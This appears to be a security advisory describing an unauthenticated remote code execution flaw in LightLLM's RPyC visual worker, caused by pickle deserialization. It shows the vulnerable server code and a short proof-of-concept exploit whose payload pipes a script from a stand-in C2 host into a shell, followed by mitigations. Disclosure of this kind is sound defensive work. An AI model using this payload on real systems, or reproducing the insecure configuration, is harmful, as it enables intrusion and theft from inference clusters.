A critical unauthenticated remote code execution vulnerability has been uncovered in LightLLM, the high-throughput, distributed Python inference framework widely adopted for serving large language models and multi-modal vision-language architectures. Cataloged under CVE-2026-103395 and GitHub Advisory GHSA-mw2v-h3wh-mp72 with a CVSS v3.1 base score of 9.8 (Critical), the flaw enables adversaries to execute arbitrary shell commands across backend GPU inference nodes via insecure Python object deserialization over internal RPC channels.
The Architecture of Distributed Multi-Modal Serving
In modern enterprise AI stacks, inference engines like LightLLM partition computational workloads across dedicated specialized worker pools. While text token generation is routed through tensor-parallel LLM workers, high-resolution visual inputs (such as image embeddings and vision transformer feature extraction) are offloaded to specialized visual processing daemons known as visual_only workers.
To coordinate inter-process communication between front-facing API gateways and backend vision workers, LightLLM relies on RPyC (Remote Python Call), an RPC library that facilitates transparent distributed computing across Python processes. However, because multi-modal tensor payloads frequently involve NumPy arrays and PyTorch tensors, developers configured RPyC to permit arbitrary object serialization.
Vulnerability Mechanics: Dangerous Pickle Deserialization (CWE-502)
CVE-2026-103395 resides in lightllm/server/visualserver/visual_only_manager.py and objs.py. When a node initializes in visual_only mode, it spins up an RPyC server binding to a configured port without enforcing mutual TLS or token authentication. Crucially, the server configuration enables allow_pickle=True:
# Vulnerable Component: lightllm/server/visualserver/visual_only_manager.py
from rpyc.utils.server import ThreadedServer
from rpyc.core import SlaveService
# Insecure RPyC Configuration exposing unauthenticated socket
class VisualOnlyService(SlaveService):
def exposed_remote_infer_images(self, image_data):
# Deserializes client-supplied payload with full execution capabilities
return self.engine.infer(image_data)
server = ThreadedServer(
VisualOnlyService,
port=visual_port,
protocol_config={"allow_pickle": True} # Fatal Configuration Flaw
)
server.start()
Because Python's native pickle protocol permits arbitrary object instantiations via the magic method __reduce__, an unauthenticated attacker who can route TCP packets to the visual server port can establish an RPyC handshake and invoke remote_infer_images with a crafted pickle payload:
# Attacker Exploitation Proof-of-Concept
import rpyc
import pickle
import os
class ExploitPayload:
def __reduce__(self):
# Executes arbitrary system command upon unpickling on GPU worker
return (os.system, ("curl -s https://c2.internal/beacon.sh | sh",))
# Connect directly to exposed LightLLM visual worker port
conn = rpyc.connect("10.0.4.15", 22345, config={"allow_pickle": True})
conn.root.remote_infer_images(ExploitPayload())
Upon receipt, the LightLLM worker unpacks the serialized object, immediately executing the attacker's shell command under the privileges of the Python worker process—frequently root or an unrestricted container service account with direct access to GPU memory space.
Inference Infrastructure Attack Impact Matrix
| Attack Vector | Blast Radius | Strategic Threat to Enterprise AI |
|---|---|---|
| Weights Exfiltration | Local File System / HuggingFace Cache | Theft of proprietary fine-tuned weights and corporate model checkpoints |
| Inference Interception | CUDA Memory / Shared Host IPC | Interception of confidential user prompts, PII, and medical/financial queries |
| Cluster Pivot | Kubernetes Pod & Node Overlay | Compromise of NVIDIA GPU nodes used for crypto-jacking or lateral cloud movement |
| Adversarial Poisoning | In-Memory KV Cache & Weights | Tampering with active model inference responses and safety guardrail bypass |
Defensive Playbook & Mitigation Strategies
- Upgrade LightLLM: Immediately apply vendor patches released for versions 1.2.1+ that deprecate unpickling across RPC boundaries and replace raw Python object passing with secure schema-validated formats (such as Protocol Buffers or Safetensors).
- Implement Strict Kubernetes NetworkPolicies: Ensure worker pods running visual models never accept incoming connections from arbitrary cluster namespaces or ingress gateways; restrict RPyC/RPC listener access exclusively to the primary LightLLM coordinator pod.
- Disable Default Pickle Support in RPyC: Audit all distributed Python services to enforce
allow_pickle=Falseacross all internal IPC layers. - Run Inference Workloads as Non-Root: Confine AI serving containers using non-root UID/GID configurations, dropped Linux capabilities (
ALL), and read-only root filesystems.



